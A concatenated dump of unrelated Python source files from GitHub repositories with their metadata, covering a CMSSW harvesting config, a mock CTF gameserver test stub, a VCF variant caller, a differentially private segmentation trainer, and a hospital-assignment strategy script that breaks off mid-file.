feature_col_names = ['Name', 'SurName', 'City', 'Street', 'StreetNr', 'ZipCode', 'StartStreet', 'StartStreetNr', 'City', 'StartZipCode', 'StartCity', 'EndStreet', 'EndStreetNr', 'EndZipCode', 'EndCity']
prediction_class_name = ['CorrectDelivery']
X = self.df[feature_col_names].values # predictor feature columnd (8 X m)
y = self.df[prediction_class_name].values # predicted calss (1 = true, 0 = false) column (1 X m)
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y, test_size = self.testSize, random_state = 42) # 42 is the answer to everything
def DataSplitVerifyingTwo(self):
print("Original True : {0} ({1:0.2f}%)".format(len(self.df.loc[self.df['CorrectDelivery'] == 1]), len(self.df.loc[self.df['CorrectDelivery'] == 1]) / len(self.df.index) * 100))
print("Original False : {0} ({1:0.2f}%)".format(len(self.df.loc[self.df['CorrectDelivery'] == 0]), len(self.df.loc[self.df['CorrectDelivery'] == 0]) / len(self.df.index) * 100))
print()
print("Training True : {0} ({1:0.2f}%)".format(len(self.y_train[self.y_train[:] == 1]), len(self.y_train[self.y_train[:] == 1]) / len(self.y_train) * 100))
print("Training False : {0} ({1:0.2f}%)".format(len(self.y_train[self.y_train[:] == 0]), len(self.y_train[self.y_train[:] == 0]) / len(self.y_train) * 100))
print()
print("Test True : {0} ({1:0.2f}%)".format(len(self.y_test[self.y_test[:] == 1]), len(self.y_test[self.y_test[:] == 1]) / len(self.y_test) * 100))
print("Test False : {0} ({1:0.2f}%)".format(len(self.y_test[self.y_test[:] == 0]), len(self.y_test[self.y_test[:] == 0]) / len(self.y_test) * 100))
print() | AiLogisticsTeam2017/ArtInt | LogisticsSimulation/DataPreprocessing.py | DataPreprocessing.py | py | 18,376 | python | en | code | 0 | github-code | 50 |
40248679760 | import FWCore.ParameterSet.Config as cms
from FWCore.ParameterSet.VarParsing import VarParsing
from Configuration.Eras.Era_Run3_cff import Run3
options = VarParsing('analysis')
options.register("doSim", True, VarParsing.multiplicity.singleton, VarParsing.varType.bool)
options.register("cmssw", "CMSSW_X_Y_Z", VarParsing.multiplicity.singleton, VarParsing.varType.string)
options.register("globalTag", "tag", VarParsing.multiplicity.singleton, VarParsing.varType.string)
options.register("dataSetTag", "sample", VarParsing.multiplicity.singleton, VarParsing.varType.string)
options.parseArguments()
process = cms.Process('HARVESTING',Run3)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.DQMSaverAtRunEnd_cff')
process.load('Configuration.StandardSequences.Harvesting_cff')
process.load('DQMOffline.Configuration.DQMOfflineMC_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1),
output = cms.optional.untracked.allowed(cms.int32,cms.PSet)
)
# Input source
process.source = cms.Source("DQMRootSource",
fileNames = cms.untracked.vstring('file:step3_inDQM.root')
)
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:phase1_2022_realistic', '')
# Path and EndPath definitions
if options.doSim:
process.harvesting_step = cms.Path(process.cscDigiHarvesting)
process.dqmsave_step = cms.Path(process.DQMSaver)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.dqmSaver.workflow = '/{}/{}/{}'.format(options.dataSetTag,options.globalTag,options.cmssw)
# Schedule definition
process.schedule = cms.Schedule()
if options.doSim:
process.schedule.extend([process.harvesting_step])
process.schedule.extend([process.endjob_step, process.dqmsave_step])
| cms-sw/cmssw | Validation/MuonCSCDigis/test/runCSCDigiHarvesting_cfg.py | runCSCDigiHarvesting_cfg.py | py | 2,247 | python | en | code | 985 | github-code | 50 |
29634270624 | #!/usr/bin/env python3.5
"""A simple gameserver based on asyncio that returns
random states for submitted flags.
./gameserver-asyncio.py [host] [port]"""
import sys
import socket
import re
import asyncio
import random
import codecs
HOST = '127.0.0.1'
PORT = 8888
STATES = [b'expired', b'no such flag', b'accepted',
b'corresponding', b'own flag', b'too much']
FLAGS = re.compile(br'(\w{31}=)')
class GameServerProtocol(asyncio.Protocol):
def connection_made(self, transport):
self.transport = transport
self.peername = transport.get_extra_info('peername')
self._write_line(b'Welcome to the Game Server')
self._write_line(b'Send me your flags...')
def data_received(self, data):
response = b''
for line in data.split(b'\n'):
if not line:
continue
if not FLAGS.findall(line):
self._write_line(b'invalid flag')
continue
response += random.choice(STATES)
response += b'\n'
self.transport.write(response)
def _write_line(self, data):
if isinstance(data, str):
data = codecs.encode(data)
self.transport.write(data + b'\n')
if __name__ == '__main__':
print('Starting Game Server')
if len(sys.argv) >= 2:
HOST = sys.argv[1]
try:
socket.inet_aton(HOST)
except socket.error:
print('Invalid IP address')
sys.exit(1)
if len(sys.argv) == 3:
PORT = sys.argv[2]
try:
int(PORT)
except ValueError:
print('Port is not an int')
sys.exit(1)
loop = asyncio.get_event_loop()
c = loop.create_server(GameServerProtocol, HOST, PORT)
server = loop.run_until_complete(c)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
| takeshixx/ctfpwn | tests/gameserver-asyncio.py | gameserver-asyncio.py | py | 1,990 | python | en | code | 0 | github-code | 50 |
35571579331 | import sys
import numpy
import datetime
import re
import collections
from collections import OrderedDict
import math
import time
##
## STRING DEFINITIONS - constant strings of files that were used and additional info that couldn't be pulled from the files
##
ref_assembly_str = ',assembly=b37'
ref_md5_str = ',md5=bb77e60e9a492fd0172e2b11e6c16afd'
ref_species_str = ',species=\"Homo sapiens\"'
ref_taxonomy_str = ',taxonomy=x' #couldn't find what this acctually means
##
## VCF CONTIG INFO FUNC - Pulls out information on all contigs from reference .fasta.fai file
##
def write_contig_info(file):
contig_info =''
for line in file:
field = line.split('\t')
ID_str = field[0]
len_str = field[1]
contig_info += '##contig=<ID=' + ID_str + ",length=" + len_str +'>\n' # + ref_assembly_str + ref_md5_str + ref_species_str + ref_taxonomy_str
return contig_info
##
## VCF HEADER FUNCTION - Writes out header of the .vcf file
##
def write_vcf_header(file, fai_file_str):
date_time = datetime.datetime.now()
file_format_str = '##fileformat=VCF4.2\n'
date_str = '##fileDate=' + date_time.strftime("%Y%m%d") + '\n'
source_str = '##source=variant_call_binomV0.1\n'
ref_file_str = '##reference=file://' + fai_file_str + '\n'
contig_info_str = ''
if(fai_file_str != ''):
fai = open (fai_file_str, 'r')
contig_info_str = write_contig_info(fai)
else:
print('Warning: Fasta Index file not provided. Contig info will not be available in .vcf file.')
alt_str = '##ALT=<ID=*,Description="Represents allele(s) other than observed.">\n'
indel_str = '##INFO=<ID=INDEL,Number=0,Type=Flag,Description="Indicates that the variant is an INDEL.">\n'
dp_str = '##INFO=<ID=DP,Number=1,Type=Integer,Description="Raw read depth">\n'
gt_str = '##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">\n'
vaf_str = '##FORMAT=<ID=VAF,Number=1,Type=Float,Description="Variant frequency in sample">\n'
table_header_str = '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tHCC1143BL\n'
file.write(file_format_str + date_str + source_str + ref_file_str + contig_info_str + alt_str + indel_str + dp_str + gt_str + vaf_str + table_header_str)
return file
##
## CALCULATE VARIANTS CALLS
##
class Variant:
def __init__(self, symbol, num_occ, num_reads, ref_symbol):
self.var_type, self.var_symbol, self.var_len = self.variant_def(symbol, ref_symbol)
self.num_occ = num_occ
self.num_reads = num_reads
self.occ_percent = round(float(num_occ/num_reads), 1)
self.VAF = str(self.occ_percent)
self.DP = str(self.num_reads)
def variant_def(self, symbol, ref_symbol):
if ( len(symbol) == 1):
var_symbol = symbol
if(symbol == '.'):
var_type = 'REF'
else:
var_type = 'SNV'
var_len = 1
else:
if(symbol[0]== '+'):
var_type = 'INS'
else:
var_type = 'DEL'
var_symbol = ref_symbol + ''.join(filter(str.isalpha, symbol))
var_len = int(''.join(filter(str.isdigit, symbol)))
return var_type, var_symbol, var_len
def binomial(n, k, p):
return (math.factorial(n)/(math.factorial(k)*math.factorial(n-k)))*(p**k)*(1-p)**(n-k)
def calculate_binomial(var1, var2):
res_vars = {}
res1 = binomial(float(var1.num_reads), float(var1.num_occ), float(p))
res2 = binomial(float(var2.num_reads), float(var2.num_occ), float(p))
res3 = binomial(float(var1.num_reads), float(var1.num_reads), float(p))
if(res1 >= res2):
if(res1 > res3):
return var1, None
else:
return var1, var2
else: #res1 < res2
if(res2 > res3):
return var2, None
else:
return var1, var2
def prepare_read_str(read_str): #raname to calculate_variants
read_str = re.sub('\^.', '', read_str) #remove caret and next symbol
read_str = re.sub('\$', '', read_str ) #remove dollar
read_str = re.sub('\,', '.', read_str) #substitute comma with dot
read_str = read_str.upper() #switch all letters to uppercase
return read_str
##
## STORE SINGLE PILEUP CALLS
##
class Pileup_line:
def __init__(self, new_line):
self.new_line = new_line
field = new_line.split("\t")
self.seq_str = field[0] # sequence name string
self.pos_str = field[1] # position string
self.ref_str = field[2] # reference base string
self.cnt_str = field[3] # read count string
self.res_str = field[4] # result string
self.qual_str = field[5] # base quality string
self.pos = int(self.pos_str)
self.cnt = int(self.cnt_str)
self.read_vars = collections.OrderedDict()
self.read_vars = {
'.':0,
'A':0,
'T':0,
'C':0,
'G':0
}
self.var1 = None
self.var2 = None
def process_read_line(self):
self.find_variants(self.res_str)
return self.call_variants_binomial(self.var1, self.var2)
def find_variants (self, read_str):
# var1 = None
# var2 = None
has_ins = read_str.find('+')
has_del = read_str.find('-')
read_str = prepare_read_str(read_str)
if ((has_ins == -1) and (has_del == -1)):
sym_cnt = collections.Counter(read_str.strip('"')).most_common()
# print(sym_cnt)
if (len(sym_cnt) == 1):
self.var1 = Variant(sym_cnt[0][0], sym_cnt[0][1], self.cnt, self.ref_str)
self.var2 = None
else:
self.var1 = Variant(sym_cnt[0][0], sym_cnt[0][1], self.cnt, self.ref_str)
self.var2 = Variant(sym_cnt[1][0], sym_cnt[1][1], self.cnt, self.ref_str)
elif (has_ins != -1 or has_del != -1):
# print("INDEL")
self.prepare_read_vars(read_str)
if(self.read_vars_list[1][1] == 0):
self.var1 = Variant(self.read_vars_list[0][0], self.read_vars_list[0][1], self.cnt, self.ref_str)
self.var2 = None
else:
self.var1 = Variant(self.read_vars_list[0][0], self.read_vars_list[0][1], self.cnt, self.ref_str)
self.var2 = Variant(self.read_vars_list[1][0], self.read_vars_list[1][1], self.cnt, self.ref_str)
# print(self.var1.var_symbol)
# print(self.var2.var_symbol)
def prepare_read_vars(self, read_str):
skip_index = 0
for i in range(0, len(read_str)):
if(i<skip_index) : continue #skip indel symbols
if(read_str[i] == '+' or read_str[i] == '-'):
num_len = 0
for j in range (i+1, len(read_str)):
if(read_str[j].isnumeric()): num_len +=1
else: break
indel_len = int(read_str[i+1 : i+1+num_len])
# if(read_str[i-1] == '.'):
new_indel = read_str[(i):(i+num_len+indel_len+1)]
# else:
# new_ins = read_str[i-1] + read_str[(i+2):(i+2+ins_len)]
if new_indel in self.read_vars : self.read_vars.update({new_indel:self.read_vars[new_indel]+1})
else : self.read_vars.update({new_indel:1})
self.read_vars.update({'.':self.read_vars['.']-1}) #need to substitute number of matches by one
skip_index = i + num_len + indel_len +1
if(read_str[i] == '.'): self.read_vars.update({'.' :self.read_vars['.']+1})
if(read_str[i] == 'A'): self.read_vars.update({'A' :self.read_vars['A']+1})
if(read_str[i] == 'T'): self.read_vars.update({'T' :self.read_vars['T']+1})
if(read_str[i] == 'C'): self.read_vars.update({'C' :self.read_vars['C']+1})
if(read_str[i] == 'G'): self.read_vars.update({'G' :self.read_vars['G']+1})
self.read_vars = OrderedDict(sorted(self.read_vars.items(), key=lambda item: item[1], reverse=True))
self.read_vars_list = list(self.read_vars.items())
def call_variants_binomial(self, var1, var2):
result_line = ''
genotype_str = ''
ref_field = 'ERROR'
alt_field = 'ERROR'
gt_field = 'ERROR'
info_field = 'DP=' + var1.DP
if var2 is None: #single variant call
# print('single variant: ' + var1.var_symbol)
ref_field = self.ref_str
alt_field = var1.var_symbol
if(var1.var_symbol == '.'):
gt_field = '0/0:'+var1.VAF
else:
gt_field = '1/1:'+var1.VAF
else: #binomial calculation of two most probable calls
var1, var2 = calculate_binomial(var1, var2)
if(var2 is None): #one call is the most probable one
# print('binomial, single variant: ' + var1.var_symbol)
if(var1.var_type == 'INS' or var1.var_type == 'DEL'):
info_field = 'INDEL;' + info_field
if(var1.var_type == 'DEL'):
ref_field = var1.var_symbol
alt_field = self.ref_str
gt_field = '1/1:'+var1.VAF
else:
ref_field = self.ref_str
alt_field = var1.var_symbol
if(var1.var_symbol == '.'):
gt_field = '0/0:'+var1.VAF
else:
gt_field = '1/1:'+var1.VAF
else: #two calls are most probable
# print('binomial, double variant: '+var1.var_symbol + '/' + var2.var_symbol)
if(var1.var_type == 'INS' or var1.var_type == 'DEL' or var2.var_type == 'INS' or var2.var_type == 'DEL'):
info_field = 'INDEL;' + info_field
if(var1.var_type == 'DEL' and var2.var_type == 'DEL'):
ref_field = var1.var_symbol
alt_field = self.ref_str
gt_field = '1/1:'+var1.VAF
result_line += self.seq_str + '\t' + self.pos_str + '\t' + '.' + '\t' + ref_field + '\t'
result_line += alt_field + '\t' + '.' + '\t' + 'PASS' + '\t' + info_field + '\t' + 'GT:VAF' + '\t' + gt_field + '\n'
ref_field = var2.var_symbol
alt_field = self.ref_str
gt_field = '1/1:'+var2.VAF
elif(var1.var_type == 'DEL' and var2.var_type != 'DEL'):
ref_field = var1.var_symbol
alt_field = self.ref_str
gt_field = '0/0:'+var1.VAF
result_line += self.seq_str + '\t' + self.pos_str + '\t' + '.' + '\t' + ref_field + '\t'
result_line += alt_field + '\t' + '.' + '\t' + 'PASS' + '\t' + info_field + '\t' + 'GT:VAF' + '\t' + gt_field + '\n'
info_field = 'DP=' + var1.DP
ref_field = self.ref_str
alt_field = var2.var_symbol
if(var2.var_symbol == '.'):
gt_field = '0/0:' + var2.VAF
else:
gt_field = '0/1:' + var2.VAF
elif(var1.var_type != 'DEL' and var2.var_type == 'DEL'):
ref_field = var2.var_symbol
alt_field = self.ref_str
gt_field = '0/0:'+var2.VAF
result_line += self.seq_str + '\t' + self.pos_str + '\t' + '.' + '\t' + ref_field + '\t'
result_line += alt_field + '\t' + '.' + '\t' + 'PASS' + '\t' + info_field + '\t' + 'GT:VAF' + '\t' + gt_field + '\n'
info_field = 'DP=' + var1.DP
ref_field = self.ref_str
alt_field = var1.var_symbol
if(var1.var_symbol == '.'):
gt_field = '0/0:'+var1.VAF
else:
gt_field = '0/1:'+var1.VAF
else: # (var1.var_type != 'DEL' && var2.var_type != 'DEL')
ref_field = self.ref_str
if(var1.var_symbol == '.'):
alt_field = var2.var_symbol
gt_field = '0/1:' + var1.VAF + ',' + var2.VAF
elif (var2.var_symbol == '.'):
alt_field = var1.var_symbol
gt_field = '0/1:' + var2.VAF + ',' + var1.VAF
else:
alt_field = var1.var_symbol + ',' + var2.var_symbol
gt_field = '1/2:'+var1.VAF + ',' + var2.VAF
result_line += self.seq_str + '\t' + self.pos_str + '\t' + '.' + '\t' + ref_field + '\t'
result_line += alt_field + '\t' + '.' + '\t' + 'PASS' + '\t' + info_field + '\t' + 'GT:VAF' + '\t' + gt_field + '\n'
return result_line
##
## MAIN Function - goes through the pileup file, writes to .vcf file
##
def main_func(pileup_file_str, output_file_str, reference_fai_file_str):
with open (pileup_file_str, 'r') as pileup_file, open (output_file_str, 'w') as output_file:
output_file = write_vcf_header(output_file, reference_fai_file_str)
line_num = 0;
for line in iter(pileup_file.readline, ''):
line_num+=1
#if (line_num > 3): break
base_pileup = Pileup_line(line)
if(base_pileup.cnt > 0):
res_str = str(base_pileup.res_str)
processed_str = base_pileup.process_read_line()
output_file.write(processed_str)
print('Processing done.' + output_file_str + ' file created.')
##
## MAIN CODE - opens files, calls main task
##
if __name__ == "__main__" :
if(len(sys.argv) < 2):
print('Error: Please provide pileup file path')
raise NameError('Missing_arguments')
else:
pileup_file_str = sys.argv[1]
output_file_base_str = 'binom_variant'
fai = ''
p_array = [0.85]
o_def = 0
p_def = 0
f_def = 0
for i in range(2, len(sys.argv)):
if(sys.argv[i-1] == '-o' or sys.argv[i-1] == '-f'): continue
if(sys.argv[i] == '-o'):
if(o_def == 1):
print('Error: -o switch already defined')
raise NameError('Incorrect_arguments')
output_file_base_str = sys.argv[i+1]
o_def = 1
if(sys.argv[i] == '-f'):
if(f_def == 1):
print('Error: -f switch already defined')
raise NameError('Incorrect_arguments')
fai = sys.argv[i+1]
f_def = 1
if(sys.argv[i] == '-p'):
if(p_def != 0):
print('Error: -p switch already defined')
raise NameError('Incorrect_arguments')
p_def = i+1
if(p_def != 0):
p_array = []
for i in range(p_def, len(sys.argv)):
if(sys.argv[i] == '-o' or sys.argv[i] == '-f'): break
p_array.append(float(sys.argv[i]))
if(len(p_array) == 0):
print('Error: No percentages defined')
raise NameError('Incorrect_arguments')
start = time.time()
for i in p_array:
i_str = str(i)
p = i
if (output_file_base_str.rfind(".vcf", 0, len(output_file_base_str)) == -1):
output_file_str = output_file_base_str + '_p' + str(i) + '_called.vcf'
else:
output_file_str = output_file_base_str[0:output_file_base_str.rfind(".vcf", 0, len(output_file_base_str))] + '_p' + str(i) + '_called.vcf'
main_func(pileup_file_str, output_file_str, fai)
end = time.time()
print('Processing took ' + str(end - start) + ' seconds') | apanajotu/GI | GI Projekat/variant_call_binom.py | variant_call_binom.py | py | 16,784 | python | en | code | 0 | github-code | 50 |
36869289244 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from threading import Event, Thread
def countdown(n, started_evt):
print('start')
started_evt.set()
while n > 0:
print(n)
n -= 1
time.sleep(5)
started_evt = Event()
print('Launching countdown')
t = Thread(target=countdown, args=(10, started_evt))
t.start()
t.join()
started_evt.wait()
print('countdown is running')
| YellowDong/experience | python_learning/threading/thread.py | thread.py | py | 414 | python | en | code | 0 | github-code | 50 |
3664284212 | import argparse
import random
import warnings
from datetime import datetime
import pickle
import matplotlib.pyplot as plt
import numpy as np
import torch
from opacus import PrivacyEngine
from opacus.utils.batch_memory_manager import BatchMemoryManager
from torch.optim.lr_scheduler import ReduceLROnPlateau
from utils import (
get_liver_dataloaders,
test,
train
)
from linknet9 import LinkNet9
from unet9 import UNet9
from parameter import Parameters
import segmentation_models_pytorch as smp
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", type=str, default="carvana", choices=["carvana", "pancreas", "liver"])
parser.add_argument("--model-arch", type=str, default="monet", choices=["monet", "unet", "unet9", "linknet9"])
parser.add_argument("--batch-size", type=int, default=32)
parser.add_argument("--epochs", type=int, default=10)
parser.add_argument("--act-func", type=str, default="mish", choices=["tanh", "relu", "mish"])
parser.add_argument("--target-epsilon", type=float, default=3)
parser.add_argument("--noise-mult", type=float, default=None)
parser.add_argument("--grad-norm", type=float, default=1.5)
parser.add_argument("--privacy", type=bool, action=argparse.BooleanOptionalAction, default=True)
parser.add_argument("--scale-norm", type=bool, action=argparse.BooleanOptionalAction, default=False)
parser.add_argument("--norm-layer", type=str, default="group")
parser.add_argument("--num-groups", type=int, default=32)
return parser.parse_args()
def hook_fn(module, input, output):
visualisation[module] = np.transpose(torch.flatten(output.cpu()).detach().numpy())
def get_all_layers(model):
for name, layer in model._modules.items():
layer.register_forward_hook(hook_fn)
if __name__ == "__main__":
warnings.filterwarnings("ignore")
SEED = 1302
torch.backends.cudnn.deterministic = True
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.cuda.manual_seed_all(SEED)
generator = torch.Generator().manual_seed(SEED)
args = parse_args()
params = Parameters(
args.dataset,
args.batch_size,
args.act_func,
args.model_arch,
args.epochs,
args.target_epsilon,
args.grad_norm,
args.noise_mult,
args.privacy,
args.scale_norm,
args.norm_layer,
args.num_groups
)
if args.dataset == 'liver':
train_loader, val_loader = get_liver_dataloaders(params)
else:
raise ValueError(
"Please specify a valid dataset. ('liver')"
)
if args.model_arch == 'linknet9':
model = LinkNet9(1, 1, scale_norm=args.scale_norm, norm_layer=args.norm_layer).to(params.device)
elif args.model_arch == 'unet9':
model = UNet9(1, 1, scale_norm=args.scale_norm, norm_layer=args.norm_layer).to(params.device)
else:
raise ValueError(
"Please specify a valid architecture. ('linknet9', 'unet9')"
)
modules_to_visualize = [model.conv2, model.res1, model.scale_norm_1,
model.conv4, model.res2, model.scale_norm_2,
model.conv5, model.deco1, model.scale_norm_3,
model.scale_norm_3, model.res3, model.scale_norm_4,
model.deco3, model.deco4, model.scale_norm_5,
model.scale_norm_5, model.res4, model.scale_norm_6]
plots_titles = [
"conv2", "res1", "scale_norm_1",
"conv4", "res2", "scale_norm_2",
"conv5", "deco1", "scale_norm_3",
"scale_norm_3", "res3", "scale_norm_4",
"deco3", "deco4", "scale_norm_5",
"scale_norm_5", "res4", "scale_norm_6"
]
criterion = smp.losses.DiceLoss(mode="binary")
optimizer = torch.optim.NAdam(model.parameters(), lr=0.0005)
scheduler = ReduceLROnPlateau(optimizer, mode="min", patience=4, factor=0.5, verbose=True)
visualisation = {}
get_all_layers(model)
privacy_engine = PrivacyEngine()
model, optimizer, train_loader = privacy_engine.make_private_with_epsilon(
module=model,
optimizer=optimizer,
data_loader=train_loader,
target_delta=1e-5,
target_epsilon=args.target_epsilon,
max_grad_norm=1.5,
epochs=args.epochs,
)
optimizer.defaults = optimizer.original_optimizer.defaults
val_loss_list = []
dice_score_list = []
with BatchMemoryManager(
data_loader=train_loader,
max_physical_batch_size=16,
optimizer=optimizer
) as memory_safe_data_loader:
for epoch in range(args.epochs):
print(f"Epoch {epoch+1}:")
train(memory_safe_data_loader, model, optimizer, criterion, params.device)
dice_score, loss = test(val_loader, model, criterion, params.device)
val_loss_list.append(loss)
dice_score_list.append(dice_score) # .cpu().detach().numpy()
scheduler.step(dice_score)
print(f"acc: {max(dice_score_list)}, final eps: {privacy_engine.accountant.get_privacy_spent(delta=1e-5)}")
rows = 6
columns = 3
fig = plt.figure(figsize=(columns * 6, rows * 4))
fig.suptitle("test_title", fontsize=16)
for i in range(len(modules_to_visualize)):
fig.add_subplot(rows, columns, i+1)
pickle.dump(
visualisation[modules_to_visualize[i]],
open("histograms/{}_{}_{}_s{}_p{}_{}_{}.p".format(
args.dataset,
args.epochs,
args.norm_layer,
args.scale_norm,
args.privacy,
args.model_arch,
plots_titles[i]
), "wb")
)
plt.hist(
visualisation[modules_to_visualize[i]],
bins=50,
range=(-2, 6)
)
plt.title("{}".format(plots_titles[i]))
fig.gca().autoscale()
plt.savefig('histograms/{}_{}_{}_{}_{}_s{}_p{}.png'.format(
datetime.now().strftime("%Y-%m-%d_%H-%M-%S"),
args.model_arch,
args.dataset,
args.epochs,
args.norm_layer,
args.scale_norm,
args.privacy
))
plt.close(fig)
print("Plot saved")
| mrchntia/ScaleNorm | semantic_segmentation/hist_plot.py | hist_plot.py | py | 6,311 | python | en | code | 1 | github-code | 50 |
14825640393 | from PIL import Image,ImageDraw
from utils.operation import YOLO
def detect(onnx_path='ReqFile/yolov5n-7-k5.onnx',img_path=r'ReqFile/bus.jpg',show=True):
'''
检测目标,返回目标所在坐标如:
{'crop': [57, 390, 207, 882], 'classes': 'person'},...]
:param onnx_path:onnx模型路径
:param img:检测用的图片
:param show:是否展示
:return:
'''
yolo = YOLO(onnx_path=onnx_path)
det_obj = yolo.decect(img_path)
# 结果
print (det_obj)
# 画框框
if show:
img = Image.open(img_path)
draw = ImageDraw.Draw(img)
for i in range(len(det_obj)):
draw.rectangle(det_obj[i]['crop'],width=3)
img.show() # 展示
if __name__ == "__main__":
detect() | luosaidage/yolov5_onnx_server | detect.py | detect.py | py | 765 | python | en | code | 35 | github-code | 50 |
33912968454 | '''
Ejercicio 4 de la guía Nº3
Utilizando la interación while, recibe como entrada
dos números de inicio y final e informa cuantos números de ellos
son múltiplos de 2 y 7
según entendi de esto, que da un intervalo de números y a apartir de ahí
te dice cuales son los números que están en ese intervalo que son
múltiplos de 2 y 7.
'''
inicio = int(input("Ingrese un número de inicio: "))
final = int(input("Ingrese un número de final: "))
acomulador = 0
contador = 0
i = 0
rango = abs(final - inicio)
print("Los números que son múltiplos de 2 y 7 son: ", end="")
while i <= rango:
acomulador = inicio + i
if acomulador % 2 == 0 and acomulador % 7 == 0:
print(acomulador," ", end="")
i += 1
| sebacassone/programacion_ejercicios | Python/Cátedra/34.py | 34.py | py | 730 | python | es | code | 1 | github-code | 50 |
16091772252 | import socket
import re
pattern = r'(^|\s)[-a-z0-9_.]+@([-a-z0-9]+\.)+[a-z]{2,6}(\s|$)'
file = open("T25.4_file.txt")
sock = socket.socket()
host, port = socket.gethostname(), 12345
sock.connect((host, port))
sock.send(pattern.encode())
msg = sock.recv(1024).decode()
print(msg)
for line in file:
sock.send(' '.join(line.split()).encode())
msg = sock.recv(1024).decode()
print(msg)
sock.close()
| andriidem308/python_practice | matfiz_tasks/Topic25_Sockets/T25.4_client.py | T25.4_client.py | py | 416 | python | en | code | 1 | github-code | 50 |
71371652634 | import gspread
from oauth2client.service_account import ServiceAccountCredentials
import matplotlib.pyplot as plt
scope = ["https://www.googleapis.com/auth/spreadsheets",
"https://www.googleapis.com/auth/drive"]
creds = ServiceAccountCredentials.from_json_keyfile_name('credentials.json', scope)
client = gspread.authorize(creds)
sheet = client.open("Teste Python").sheet1
temp = sheet.col_values(1)
time = sheet.col_values(2)
t = []
for i in temp:
t.append(float(i))
plt.title("Monitoramento de temperatura")
plt.ylabel("Temperatura / °C")
plt.xlabel("Hora")
plt.axis(ymin=0.0, ymax=40.0)
plt.plot(time, t, label="Temperaturas", marker="o")
plt.legend()
plt.grid(True)
plt.show()
'''
scopes = ["https://www.googleapis.com/auth/spreadsheets",
"https://www.googleapis.com/auth/drive"]
json_file = "credentials.json"
'''
"""
def login():
credentials = service_account.Credentials.from_service_account_file(json_file)
scoped_credentials = credentials.with_scopes(scopes)
gc = gspread.authorize(scoped_credentials)
return gc
def leitor(aba):
gc = login()
planilha = gc.open("data")
aba = planilha.worksheet("Página1")
dados = aba.get_all_records()
df = pd.DataFrame(dados)
return df
def escritor(lista):
gc = login()
planilha = gc.open('Nome da Planilha')
planilha = planilha.worksheet('Nome da Aba')
planilha.append_row(lista, value_input_option='USER_ENTERED')
""" | Raj326/Monitoramento-de-Ambiente | dashboard.py | dashboard.py | py | 1,457 | python | en | code | 0 | github-code | 50 |
24162568413 | from data import Hospitals, StatisticsStudent
import matplotlib.pyplot as plt
from copy import deepcopy
import numpy as np
import assignments
import lpsolver
import csv
import random
import pandas as pd
import collections
from matplotlib.ticker import MaxNLocator
import glob
def make_student_list(hospitals):
student = StatisticsStudent(1)
student.reported = student.priorities = hospitals.names
student_list = list()
student_list.append(student)
for i in range(2, 639):
# duplicate all fields like reported
duplicate_student = deepcopy(student)
# set another id
duplicate_student.id = i
student_list.append(duplicate_student)
return student_list
# shuffle a random reported list for the first student and return the updated list
def shuffle_one_student(student_priorities):
np.random.shuffle(student_priorities)
return student_priorities
# after we got the same reported (except from student[0])we make a lottery and check
# if student[0] have a better probs
def make_lottery(students, hospitals, num_of_iter):
order = assignments.get_hospitals_order(hospitals)
probs = assignments.expected_hat(students, hospitals, order, num_of_iter)
problem = lpsolver.AssignmentProblem(probs, order, students)
new_probs = problem.solve()
return new_probs, order
def swap(list, index_a, index_b):
list[index_b], list[index_a] = list[index_a], list[index_b]
# change priorities in percentage chance
def flip_priorities(students, num_of_filps, percentage_chance):
for index in range(len(students)):
for i in range(num_of_filps):
priority_list = students[index].priorities
# percentage_chance to swap 2 items from the priority list
if random.random() < percentage_chance:
# swap 2 random items
rand_a = random.randint(0, len(priority_list) - 1)
rand_b = random.randint(0, len(priority_list) - 1)
swap(students[index].priorities, rand_a, rand_b)
return students
def fill_strategy(priorities_queue, strategy):
for j in range(len(strategy)):
next_item = priorities_queue.popleft()
try:
index = next(i for i, k in enumerate(strategy) if k == "")
if next_item in strategy:
continue
else:
strategy[index] = next_item
except StopIteration:
pass
# strategy 1: one place up - from top 5 hospitals if you can take each of them one place up
def strategy1(priorities, strategy, top5, hospital_value):
indices = [priorities.index(x) for x in top5]
indices.sort()
# fill strategies 1
for i in indices:
# same place as at the priority list -> don`t move
if i-1 < 0 or hospital_value[i] == priorities[i]:
strategy[i] = priorities[i]
# if the new position is already taken -> don`t move
elif strategy[i-1] == "":
strategy[i-1] = priorities[i]
# check if valid move
else:
strategy[i] = priorities[i]
return strategy
# strategy 2: one place down - from last 5 hospitals if you can take each of them one place down
def strategy2(priorities, strategy, last5, hospital_value):
indices = [priorities.index(x) for x in last5]
indices.sort(reverse=True)
for i in indices:
# same place as the last 5 items at priority list -> don`t move
if i+1 >= len(strategy) or hospital_value[i] == priorities[i]:
strategy[i] = priorities[i]
elif strategy[i+1] == "":
strategy[i + 1] = priorities[i]
# if the new position is already taken -> don`t move
else:
strategy[i] = priorities[i]
return strategy
# strategy 3: two place up - from top 3 hospitals if you can take each of them 2 place up
def strategy3(priorities, strategy, top3, hospital_value):
indices = [priorities.index(x) for x in top3]
indices.sort()
# fill strategies 3
for i in indices:
# same place as at the priority list -> don`t move
if i-2 < 0 or hospital_value[i] == priorities[i]:
strategy[i] = priorities[i]
# if the new position is already taken -> don`t move
elif strategy[i-2] == "":
strategy[i-2] = priorities[i]
# check if valid move
elif [i-1] == "":
strategy[i-1] = priorities[i]
else:
strategy[i] = priorities[i]
return strategy
# strategy 4 : two place down - from last 3 hospitals if you can take each of them 2 place down
